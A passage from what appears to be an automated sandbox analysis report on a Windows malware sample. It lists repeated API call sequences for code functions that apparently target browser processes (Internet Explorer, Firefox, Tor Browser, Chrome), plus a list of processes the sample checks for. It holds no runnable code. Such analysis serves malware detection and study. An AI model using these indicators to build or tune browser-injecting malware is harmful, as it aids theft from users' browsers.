Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01426370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01426370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01426370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01413510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01413510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01413510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCur